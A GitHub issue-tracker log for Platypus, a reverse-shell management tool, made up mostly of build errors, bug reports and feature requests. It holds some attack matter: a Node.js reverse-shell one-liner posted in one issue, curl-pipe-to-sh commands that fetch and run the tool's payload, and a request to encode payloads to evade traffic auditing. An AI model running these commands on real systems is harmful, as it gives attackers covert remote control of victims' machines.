编译最后一步的时候总是报错  测试的环境均为Ubuntu20.04 并且在kali等Linux报错基本如图所示  网络均正常 均能访问外网等服务
![11](https://user-images.githubusercontent.com/77220702/152421206-a45e0b65-a62e-4304-8abc-aca9f7ceea1d

[2022-02-04 01:32] WangYihang commented on #107
感谢师傅反馈，这两个问题之前已经有师傅遇到了，并且已经被解决。

[2022-02-04 01:35] WangYihang commented on #107
解决方案：
1. 先运行一次 Platypus，让它生成 config.yml
2. 修改 [`config.yml`](https://github.com/WangYihang/Platypus/blob/master/assets/config.example.yml#L26-L27) 的 `restful.host` 属性为 `0.0.0.0`。
3. 再次运行 Platypus

[2022-02-04 03:02] WangYihang commented on #107
已解决。麻烦师傅重新 clone 并重新编译一次即可，我看看这边能不能发一个 hotfix。

我这边的测试环境是 Ubuntu 20.04 x64 Vultr Los Angeles。

[2022-02-04 04:03] WangYihang commented on #107
Pre-Release 已发。

* https://github.com/WangYihang/Platypus/releases/tag/v1.5.1

[2022-02-04 04:03] WangYihang commented on #106
Pre-Release 已发。

* https://github.com/WangYihang/Platypus/releases/tag/v1.5.1

[2022-02-04 04:04] WangYihang commented on #105
New hotfix released.

* https://github.com/WangYihang/Platypus/releases/tag/v1.5.1

[2022-02-04 13:03] xiaosage666 opened #108 "关于隧道的错误"
首先使用Tunnel Create Dynamic 123 123 123 123 创建了一条类似ssh 动态端口转发的隧道
然后返回结果给了127.0.0.1 和随机的一个端口 用Linux自带的proxychains 代理配置好127.0.0.1 35689 能访问目标内网的服务，那么问题就是四个参数都是随机的并不能自定义 返回的ip地址和端口 也就意味着只能用127.0.0.1在vps上面访问目标内网，并不是在其他机器上通过vps的ip和端口访问目标内网，还有一个bug就是删除了这个隧道再次使用代理访问依然可以访问，并且Platypus还显示了访问的记录，所以delete这个功能执行了貌似实际上并没有作用。
![10](https://user-images.githubusercontent.com/77220702/152533664-ece02398-a119-4f84-be4

[2022-02-04 13:16] WangYihang commented on #108
确实，Delete 功能确实还没来得及实现，见[代码](https://github.com/WangYihang/Platypus/blob/master/internal/cli/dispatcher/tunnel.go#L74-L86)。

[2022-02-04 13:25] WangYihang commented on #108
这个 Tunnel 确实只最基本的功能，对用户使用确实还不是特别友好。目前在 dev 分支有计划重新写一个客户端和服务端分离的版本，但苦于没时间，只施工了一半（客户端侧只实现了交互式 Shell）。

### 临时解决方案

师傅您这个情况可以先用一个外部的端口转发来实现把 127.0.0.1 的本地环回端口转发到 0.0.0.0。

* [rinetd](http://www.rinetd.com/)
* [port-forwarder.py](https://gist.github.com/WangYihang/e7d36b744557e4673d2157499f6c6b5e)

[2022-02-24 13:11] didayeda opened #115 "window 增加上传文件功能"
在只有一个shell的时候windows文件上传还是一个很希望有的功能。

[2022-02-25 02:53] WangYihang commented on #115
感谢反馈，已加入 TODO list。

[2022-02-25 02:54] #106 closed

[2022-02-25 02:54] #107 closed

[2022-02-25 02:55] WangYihang commented on #69
Pre-Release 已发。

* https://github.com/WangYihang/Platypus/releases/tag/v1.5.1

[2022-02-25 02:55] #69 closed

[2022-02-25 03:55] didayeda opened #116 "The result of the shell execution back is garbled,"
The result of the shell execution back is garbled, which should be very information about the encoding of the agent side.

[2022-02-25 03:57] #116 closed

[2022-02-25 04:01] didayeda commented on #115
谢谢，在测试过程中发现，当交互过程中如果cmd卡住，执行exit后，server端会卡死。

[2022-02-25 06:47] WangYihang opened #117 "在测试过程中发现，当交互过程中如果cmd卡住，执行exit后，server端会卡死。"
谢谢，在测试过程中发现，当交互过程中如果cmd卡住，执行exit后，server端会卡死。

_Originally posted by @didayeda in https://github.com/WangYihang/Platypus/issues/115#issuecomment-1050499284_

[2022-02-25 06:48] WangYihang commented on #117
@didayeda 师傅请问可以麻烦您提供一下复现这个问题的具体步骤吗？

[2022-02-25 12:30] didayeda commented on #117
等我在遇到的时候录下来。现在只能简单描述下，就是进入win10回连的shell，在cmd执行命令，这个命令比如下载等会卡死的指令，在卡死的时候，退出这个shell会导致整个server端卡住。

[2022-02-26 03:43] WangYihang commented on #117
好的好的，非常感谢，我这边也尝试复现一下。

另外请问您是如何获取 Windows 10 的反向 Shell 的呢？netcat 吗？还是 powershell？可以提供一下对应的命令吗？

[2022-02-27 12:04] didayeda commented on #117
下面是今天测试的时候碰到的卡死情况。
C:\Program Files (x86)>ftp
ftp
^Cos.Interrupt, Exit? [Y/N] N
Invalid command.

exit
(❖)[nt authority\system] »

[2022-02-27 14:31] WangYihang commented on #117
收到，好的。

另外请问您是如何获取 Windows 10 的反向 Shell 的呢？netcat 吗？还是 powershell？可以提供一下对应的命令吗？

[2022-03-03 02:31] No-Github opened #120 "添加 Linux arm64 的打包版本"
希望可以添加 Linux arm64 的打包版本，麻烦师傅了😀

[2022-03-03 04:19] WangYihang commented on #120
@No-Github 好的，感谢建议。

[2022-03-03 04:43] WangYihang commented on #120
欸，问一下师傅你的需求是要在 arm64 上运行控制端（Platypus）还是要通过 Termite 来控制 arm64 的机器呢？

如果是后者的话，暂时还不能做到。（后续，我会把 Platypus 和 Termite 分成两个项目来维护。这样就可以让用户选择给 Victim 发送哪个架构的 Termite 二进制程序了。但是目前只能发送 amd64 Linux 的 Termite，也就是说，目前只能通过 Termite 控制 Linux amd64 的机器）

如果是前者，我稍后会把 arm64 的 Platypus 添加到 [v1.5.1](https://github.com/WangYihang/Platypus/releases/tag/v1.5.1) 里。

[2022-03-03 05:03] WangYihang commented on #120
已解决 [1]。

[1] https://github.com/WangYihang/Platypus/releases/download/v1.5.1/platypus_linux_arm64

[2022-03-03 05:03] No-Github commented on #120
是在 arm64 上运行控制端

[2022-03-03 05:04] No-Github commented on #120
谢谢师傅🙏

[2022-03-03 05:04] #120 closed

[2022-03-03 07:59] didayeda commented on #117
...powershell脚本起的shell
sh = require('child_process').exec('cmd.exe');var client = new net.Socket();client.connect(PORT, 'IP', function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);}

[2022-03-03 11:14] WangYihang commented on #117
收到，好的。我研究一下。

[2022-03-06 11:56] qianniaoge opened #121 "13339 web bash shell反弹命令在index这似乎很糟糕"
1.需要在配置文件自定义反弹shell命令的请求路径。

[2022-03-06 15:42] WangYihang commented on #121
@qianniaoge 请问是否可以描述得更详细一点呢？

[2022-03-06 15:49] qianniaoge commented on #121
详细的描述如下：
1.listen port 13339 path:/ 路径有shell反弹shell的命令，这个路径或许需要给使用者更多选择。
2.反弹shell的内容需要编码，对于流量审计的内网会造成告警，这个编码或许能暂时逃避规则。
3.与控制端的通信安全，AES加密通信数据。

感谢作者开源项目。

[2022-03-07 03:32] didayeda commented on #117
在redhat操作系统上，使用nc启动shell,在升级为pty后，退出时卡死。

[root@iZ6wegla3rkaj69oemh84eZ daz]# exi2022/03/07 03:29:43 You can type `platyquit` to return to Platypus
                                                                                                         t
exit
之后卡死

[2022-03-07 05:31] WangYihang commented on #117
好滴，我过段时间搭个环境测一下。最近比较忙，感谢师傅反馈。

（另外，建议直接用 Termite，而不是在普通的反弹 Shell 中使用 pty。Termite 对交互式 Shell 的支持比普通的反弹 Shell 好很多。）

[2022-03-07 05:34] WangYihang commented on #121
是个好主意，我后续想一想应该怎么具体实现，最终能弄成一个可以用户自定义配置的吧。

Termite 自带加密，如果是想逃避流量审计，可以在一开始就直接使用 Termite 来创建反弹 Shell。

[2022-03-09 06:57] didayeda commented on #117
好的感谢师傅

[2022-03-13 16:21] qq1601201705 opened #122 "软件好像没法后台运行"
环境: Ubuntu 20.04LTS云服务器
命令: nohup ./plaxxx &
感觉这个软件应该放在服务器比较合适吧？后台运行应该挺需要的。
另外这个软件很赞！期待后续加入一些渗透测试工具

[2022-03-13 16:37] qq1601201705 commented on #122
查看nohup.out

syscall.SIGTERM, Exit? [Y/N]

[2022-03-14 05:33] WangYihang commented on #122
感谢反馈，已加入 TODO list。

给师傅提供一个临时解决方案：

[code]

[2022-03-14 05:34] WangYihang commented on #122
后续会出一个前后端分离的版本。服务端只负责接收 Shell，客户端可以跑在自己机器上连接服务端，从而管理服务端的 Shell。

[2022-03-14 07:25] qq1601201705 commented on #122
另外我在Ubuntu上使用screen也成功后台了

apt install screen
screen ./plaxxxxx

这个想法感觉很棒！当然我觉得在服务器上开放一个带验证的网页端还是需要的，毕竟有时候更方便的是服务端和客户端都在服务器上，通过web页面访问
回复很快哈哈哈哈哈，牛

[2022-03-14 08:20] WangYihang commented on #122
好主意！我后面有空了整一下子。 @_<

[2022-03-14 09:45] qq1601201705 commented on #122
我现在是后台运行platypus然后临时端口转发到开放端口，访问发现web端只有连接shell和upgrade功能，建议其他指令应该也要支持才行0.0

[2022-03-14 10:50] WangYihang commented on #122
对，确实。
目前暂时还没有时间把所有命令行的功能全迁移到 Web 上。

[2022-03-15 12:11] didayeda commented on #117
师傅我又来了。
会自动killed不知到为何。
2022/03/15 12:03:39 Client version: v1.5.1
2022/03/15 12:03:39 A new encrypted termite (1.5.1) income connection from 8.209.245.171:60474
2022/03/15 12:03:39 Encrypted fire in the hole: [d32556bd7945324f6918c130e1c6611d] tcp://8.209.245.171:60474 [🐧]
2022/03/15 12:03:39 Gathering information from client...
2022/03/15 12:03:39 Gathering information from termite client...
202

[2022-03-15 12:16] didayeda commented on #117
师傅，在使用过程中，会自动killed。不知到维护，当时进程并没有停止。
2022/03/15 12:10:23 Encrypted fire in the hole: [80991a0f0111d83f5a7c0e2d62087188] tcp://47.91.25.96:51126 [🐧]
2022/03/15 12:10:23 Gathering information from client...
2022/03/15 12:10:23 Gathering information from termite client...
2022/03/15 12:10:23 Client version: v1.5.1
2022/03/15 12:10:23 A new encrypted termite (1.5.1) income connection from 47.245.59.56

[2022-03-15 12:18] didayeda commented on #117
师傅，我又来了，在使用过程中会自动kill。但是进程没有停止。
2022/03/15 12:10:23 Encrypted fire in the hole: [80991a0f0111d83f5a7c0e2d62087188] tcp://47.91.25.96:51126 [🐧]
2022/03/15 12:10:23 Gathering information from client...
2022/03/15 12:10:23 Gathering information from termite client...
2022/03/15 12:10:23 Client version: v1.5.1
2022/03/15 12:10:23 A new encrypted termite (1.5.1) income connection from 47.245.59.56:5096

[2022-03-16 05:20] WangYihang opened #123 "New termite sessions are killed for unknown reason"
师傅我又来了。
会自动killed不知到为何。

[code]

_Originally posted by @didayeda in https://github.com/WangYihang/Platypus/issues/117#issuecomment-1067914282_

[2022-03-16 05:21] WangYihang commented on #117
欸这个看起来很奇怪，我把这个问题先开一个新的 Issue，后面有空了研究一下为什么。

* #123

[2022-03-16 05:21] WangYihang commented on #123
* https://github.com/WangYihang/Platypus/issues/117#issuecomment-1067920258

[2022-03-16 05:28] WangYihang commented on #123
@didayeda，师傅我好像没太看懂，你的意思是 Platypus 的服务端被 Kill 了是吧。

[2022-03-16 07:49] didayeda commented on #123
是滴，不过我感觉应该是screen 的问题，直接起动程序就没问题。在screen里面启动会被自动killed。

[2022-03-16 09:29] WangYihang commented on #123
师傅要不试试把 Platypus 放在 tmux 里面试试？（我一直都用的是 tmux）。

这个问题看起来有可能是消耗资源过多被内核杀掉了，应该大概率是 `Out of Memory`，看看内核日志里面怎么说的。
师傅方便贴一下如下命令的执行结果吗？

[code]

如果是的话，那根本原因就是我技不如人写的代码太烂了，有什么资源可能申请了没有释放。

[2022-03-17 00:28] didayeda commented on #123
命令执行的结果是空的。

[2022-03-17 03:07] WangYihang commented on #123
确实很奇怪了...师傅要不试试看看用 tmux 跑看看会不会出现相同的情况？
[code]

[2022-04-01 16:37] AuFeng111 opened #126 "It would be nice if could get windows shell"
I really enjoyed this development project managing Linux' shell
but...
It would be nice if could get windows shell

[2022-04-02 04:46] WangYihang commented on #126
Yeah, thanks for your advice, that was already on the TODO list.

[2022-04-20 03:11] SmallPepperZ commented on #70
I was having the same issue with running the pre-built binary. After installing all of the dependencies manually, I was able to get this to build on macOS (Intel CPU), and the issue was resolved.

[2022-04-20 04:25] WangYihang commented on #70
@SmallPepperZ thank you bro to share your solution, @Nixiabing @TheCryingGame @zer0yu

[2022-04-20 06:18] TheCryingGame commented on #70
关于师傅的安装依赖，是哪些依赖呢？现在还没有解决这个问题

[2022-04-20 09:08] WangYihang commented on #70
不出意外的话，应该只需要在 Ubuntu 下，把项目 clone 下来，然后直接 `make release` 就可以了。

[2022-04-20 09:10] TheCryingGame commented on #70
但是在MacOS中无法使用，一般都在本地进行测试复现，还有个问题，docker-compose执行也是失败的，难道是在Mac上无法执行吗？是直接cd到根目录执行的

[2022-04-20 09:12] WangYihang commented on #70
T_T, 只能求助 @SmallPepperZ 师傅了。我这没有 MacOS 的环境暂时无法测试。

Would you please share your solution in detail (such as the commands for installing the dependencies)? Thank you so much!

[2022-04-20 09:14] TheCryingGame commented on #70
好吧，麻烦这位师傅了，不知道是否能注意到邮件

[2022-04-21 01:02] SmallPepperZ commented on #70
To get it to build, I had to modify the makefile's `install_dependency` action to use `brew` instead of `apt`. After running `make release` with this updated makefile, it built and ran fine.
[code]

[2022-04-21 02:26] TheCryingGame commented on #70
about this command【test -f $HOME/.nvm/nvm.sh || (curl -O https://raw.githubusercontent.com/nvm-sh/nvm/v0.39.1/install.sh | bash && bash -c "source ${HOME}/.nvm/nvm.sh && nvm install 14.19.0 && npm install -g yarn")】i    will error
<img width="1394" alt="image" src="https://user-images.githubusercontent.com/48227194/164359240-708cb652-9821-42a1-8a04-63f829aa0ecb.png">

[2022-04-22 00:36] SmallPepperZ commented on #70
Comment out that whole line in the makefile and make sure you have nvm installed

[2022-04-22 01:48] TheCryingGame commented on #70
ok，I have already succeeded

[2022-04-22 02:56] WangYihang commented on #70
Cool! Thank you guys, I will add a new Makefile for MacOS soon.

[2022-04-22 02:59] TheCryingGame commented on #70
However, I need to remind that MacOS needs to carefully test the logic code of nvm. I added the .nvm folder manually and installed it later.

[2022-04-22 03:16] WangYihang commented on #70
Okay, I will take it into consideration carefully, thank you so much.

[2022-04-26 00:14] Philabusterer opened #128 "Support for Android Devices"
Specifically using encryption. I'm assuming based on previous responses that termite will not work on Android at the moment.  Support for using standard HTTPs with TLS would also be nice.

[2022-04-26 02:41] WangYihang commented on #128
Thanks for your advice, I will add this to the TODO list.

[2022-04-26 02:43] WangYihang commented on #128
Currently, the termite binary supports Linux under the amd64 arch only.
I will try to figure out how to enable the users to configure the **OS** and **Arch** of the termite binary.

[2022-05-02 11:57] #122 closed

[2022-05-17 18:42] Diazole opened #132 "Unable to build termite on windows"
#### Description
Unable to build Termite on windows.

- pty needs to be bumped to v1.1.18
- `syscall.Kill` doesn't exist on windows

#### Reproduce
[code]

#### Environments
 - OS: Windows

[2022-05-18 03:52] #132 closed

[2022-05-18 22:01] pkreuzt opened #134 "Add proxy support to Termite"
Apart from the obvious case of dealing with closed networks with compulsory proxy, this would make it possible to use onion or i2p domains to call home. Since there's a lot of open proxy servers out there, I don't think it's necessary to deploy a dedicated server from within Platypus itself, but it indeed would be a good addition.

[2022-05-18 22:18] pkreuzt opened #135 "Windows reverse shell is not properly managed by WebUI"
#### Description
When some Windows reverse shell is spawned from within Platypus, the client window shows only the prompt twice and then it becomes unresponsive. This only affects WebUI, as shell interface works well.

#### Reproduce
1. Connect a windows reverse shell to Platypus
2. Click on "Shell" button on WebUI

#### Expected behavior
It should spawn an interactive shell, like it does with Lin

[2022-05-18 22:24] pkreuzt opened #136 "Enhance client machine identification for the case of admin/system implants"
When some implant is connected to Platypus with system privileges (specifically on Windows), interface only shows a "nt authority\system" as user identification for the client. It happens on both CLI and WebUI interfaces. This is suboptimal and should show some extra identification to better distinguish between clients. Maybe hostname?

[2022-05-18 22:34] pkreuzt opened #137 "Allow to choose a port range for servers instead of only a single port"
Some external implants can resolve to a different number of ports alternatively. and having to configure a single server for each port manually is annoying.

[2022-05-18 22:39] pkreuzt opened #138 "Linux shell starting commands are not properly executed in some cases"
#### Description
When connecting back a reverse shell from a Linux machine through a proxy (netcat shell based) I get an error when starting interactive shell. See capture. Then I need to manually execute same commands again, starting from issuing shell type as it asks for.

#### Expected behavior
Commands should be executed at the right time to be useful

#### Screenshots/Terminal log
![2022-05-1

[2022-05-23 09:29] SecT0uch opened #139 "config.yml should be read/written to user config directory"
I think we should have the config file in user config directory instead of writing it in the current dir:
* `%APPDATA%\platypus\config.yml` on Windows
* `~/.config/platypus/config.yml` on non-Windows

I couldn't find if Go has a function for that in the standard lib, but for the reference, [see how it is implemented in Nim](https://github.com/nim-lang/Nim/blob/02d94966c979c8aacf35d7929b9592c6acafb

[2022-06-21 17:59] pkreuzt opened #143 "Allow changing Platypus local shell encoding to match client side (or the opposite)"
This is specially a thing with Windows clients, which have a different text encoding depending on language of OS. Most of the time you cannot see correct names of folders or files with characters belonging to a different encoding than your local shell.

There should be some way to change local terminal encoding dinamically (without restarting whole server) so those characters could be printed and

[2022-06-30 11:41] qq1601201705 opened #144 "想要参与开发WEB UI等功能"
hello，作者老哥你好啊。我之前就注意到了这个项目，感觉做得很不错！很高兴能看到有这种支持一键反弹和管理的软件，我之前也提到感觉这个软件的web后台管理系统略有不足，也看见作者老哥最近有更新管理系统UI和添加认证功能的计划，因为我最近刚忙了一轮工作，在自学beego+vue3的过程中，希望可以参与到这个项目中来，一起完善这个项目，我看了一下代码，应该是用gin+react写的，估计是不需要我用beego再写一遍了，不过我觉得我可以用vue参与前端开发吗？另外我对后渗透等内容也很感兴趣，以前也有参与过metasploit模块的编写，不过当时的内容是行业强相关的，和TCP/IP的协议关系不大，等我后面有空了再去渗透组偷偷师，希望也能参与这个功能的开发。老哥可以留个微信交流交流吗？

[2022-07-04 03:40] WangYihang commented on #144
@qq1601201705 非常感谢您的关注。

答：非常欢迎您！

确实，Platypus 的 Web UI 非常原始简陋，主要还是因为我太菜了，没写过前端，所以看着文档**硬写**，Bug 很多，也没有很好地规划各个组件之间的关系。

答：目前 Platypus 的后渗透功能几乎等于没有（如果 socks 代理和文件管理功能不算的话）。我还在纠结是否需要把 Platypus 定位为后渗透测试工具。因为像 Metasploit-Framework 等工具的后渗透测试功能已经非常强大了，是否有必要再造轮子还需要考虑一下。我在写 Platypus 的 Agent 端（aka Termite） 的时候，发现越来越像是写一个 RAT 工具了。后渗透功能我们可以再讨论讨论。

在 GitHub 上留微信感觉有点敏感哈哈哈，不过 Platypus 有一个 Slack 组，您如果感兴趣的话点击邀请链接

[2022-07-04 03:42] WangYihang commented on #144
或许我们可以为 Platypus 添加这样的功能，通过反弹 Shell 将目前的 Shell 升级为 (1) Metepreter Session (2) Cobalt Strike 的肉鸡 (3) ...。这样会不会更实用一点？

[2022-07-05 03:32] qq1601201705 commented on #144
我认为这种思路是比较好的方向，个人不倾向于再已有的比较好的项目前提下重复开发，更倾向于融合其他功能的优势，做一些转接/引导一类的，让工具使用更方便，在我看来这也算是挺有意义的工作。

[2022-07-30 08:54] qq1601201705 commented on #144
哥们快上slack看看，我给你留言了，我这边做了一些功能了，前端也搞了不少了，来交流交流

[2022-08-08 08:35] M00nT0 opened #147 "不显示sessions的名字"
#### Description
[code]
#### Expected behavior

#### Current behavior

#### Screenshots/Terminal log
![image](https://user-images.githubusercontent.com/22413346/183374731-7cd8ceaf-d90c-4aa4-b88f-25f540f2c43a.png)
![image](https://user-images.githubusercontent.com/22413346/183375339-7034d5db-d96c-4afa-a73c-d628bdfa1f32.png)

#### Environments
 - OS: Ubuntu 18.04.6 LTS
 - Version: 1.5.1

[2022-08-08 10:47] WangYihang commented on #147
感谢师傅反馈！

您的意思是说，Web 端没有显示 Session Hash 是不？

(1) 如果是的话，有一个 临时解决方案您可以试试，先点 Shell，然后弹出来的新标签页的 URL 就是 Session Hash。（确实是个问题，这个我后面尽快搞一下）
(2) 如果不是的话，麻烦师傅再描述一下。

Web 端的文件管理功能目前正在开发，预计下几个版就会有了，:D。

[2022-08-09 03:00] WangYihang commented on #147
您那边拿到的 Shell 应该是裸的反弹 Shell 吧？

(1) 如果是的话，你可以先用 Upgrade 按钮升级到 Termite Shell。Platypus 对裸 Shell 执行 Upgrade 命令不会依赖 curl/wget 等外部命令，而是使用**分段 echo**来实现的。 如此一来，等待 Upgrade 完成之后，应该就不会卡住了。

[2022-08-09 03:30] WangYihang commented on #147
您说的这个卡住了，具体是什么表现呢？

(1) Web 端的交互式 Shell 是否正常？
(2) 命令行操作是否正常？

[2022-08-19 07:48] Ma1Dong opened #148 "你好师傅，这个文档404，是没有了吗"
https://platypus-reverse-shell.vercel.app/%E4%BD%BF%E7%94%A8/%E4%BA%A4%E4%BA%92%E6%96%B9%E5%BC%8F/cli/
![图片](https://user-images.githubusercontent.com/52943794/185570314-f559d30a-8f41-497f-8446-748786a88242.png)

[2022-08-19 08:04] WangYihang commented on #148
感谢师傅反馈，前段时间文档结构调整了一下，可能和 README 里的不太一致了。

试试这个[链接](https://platypus-reverse-shell.vercel.app/user-guide/interact/cli/)。

[2022-08-21 07:30] Ma1Dong commented on #148
可以了，感谢航总~

[2022-10-18 12:38] lrtoper opened #150 "你好，编译报错了。"
#### Description
编译报错

#### Reproduce
make all

#### Expected behavior

env GOOS=linux GOARCH=amd64 go build -ldflags="-s -w " -trimpath -o ./build/termite/termite_linux_amd64 cmd/termite/main.go
go: github.com/dchest/captcha@v1.0.0: missing go.sum entry; to add it:
        go mod download github.com/dchest/captcha
go: github.com/dchest/captcha@v1.0.0: missing go.sum entry; to add it:
        go m

[2022-10-19 01:12] WangYihang commented on #150
![image](https://user-images.githubusercontent.com/16917636/196573970-f0edc0ec-e097-4f66-82a5-25059c8f60ee.png)

[2022-10-19 04:58] lrtoper commented on #150
感谢

[2022-10-20 07:31] lrtoper opened #151 "是否可以生成一个具备基本功能的win载荷"
目前生成的termite好像只有linux版的，windows上的shell目前有什么好办法用这个管理起来吗

[2022-10-20 13:15] #150 closed

[2022-10-20 13:20] WangYihang commented on #151
目前还只能手工生成，师傅可以手工修改一下。

(1) `cmd/termite/main.go` 中的[服务端地址](https://github.com/WangYihang/Platypus/blob/master/cmd/termite/main.go#L793)，并注释掉 976 行；
(2) 下面命令中的 `GOOS` 和 `GOARCH`。

[code]

[2022-10-24 09:54] vincentcox opened #152 "Port scans and HTTPS requests will show up in the dashboard as a shell"
#### Description
Port scans and HTTPS requests will show up in the dashboard as a shell. The overview/dashboard is being polluted by random scans from the internet and GET requests from crawlers (like google or some automated scanners).

#### Reproduce
1. Run the program
2. Open https://IP:port in a browser and perform a GET HTTPS request
3. do a simple NMAP scan on the server

#### Expected behav

[2022-10-24 11:45] WangYihang commented on #152
@vincentcox, thanks for reporting.

Yes, It is a severe problem. I will try to figure out how to solve it soon.

[2022-11-02 01:03] pkreuzt commented on #135
I have a litle extra info on this I haven't noticed before. Actually the console is not completely unresponsive, but you cannot see what you are typing on it. And the result of commands is only visible after closing and reopening the shell tab. If I try to execute a 'whoami' and close the tab, this is what I see after reopening:

![2022-11-02-020026_958x696_scrot](https://user-images.githubusercon

[2022-11-07 06:06] svox07 opened #153 "curl http://192.168.88.129:13337/|sh Windows"
**Is your feature request related to a problem? Please describe.**
A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]

**Describe the solution you'd like**
A clear and concise description of what you want to happen.

**Describe alternatives you've considered**
A clear and concise description of any alternative solutions or features you've considered.

**Ad

[2022-11-10 17:03] paopp2 opened #155 "Can't run / build when following steps at README"

[2022-11-21 11:57] lemuellew opened #158 "终端 CR LF问题"
#### Description
[code]

#### Reproduce
1. qemu-system-aarch64虚拟机中
2. `curl http://10.0.3.15:13338/|sh`
...

#### Screenshots/Terminal log
![image](https://user-images.githubusercontent.com/59448437/203046161-9e7210cf-e1db-4c4c-a877-04593725413b.png)

#### Environments
 - OS: Ubuntu 20.04
 - Version: 1.5.1

[2022-11-21 13:00] WangYihang commented on #158
感谢反馈，我稍后复现一下，请问是否提供复现所需的 qemu 版本以及命令？

[2022-11-21 13:01] WangYihang commented on #155
Thanks for reporting, I will check it out soon.

[2022-11-25 03:02] lemuellew commented on #158
termOptions中增加`convertEol: true,`配置可以解决CRLF的问题。
还存在本地回显问题，无法看到输入的命令。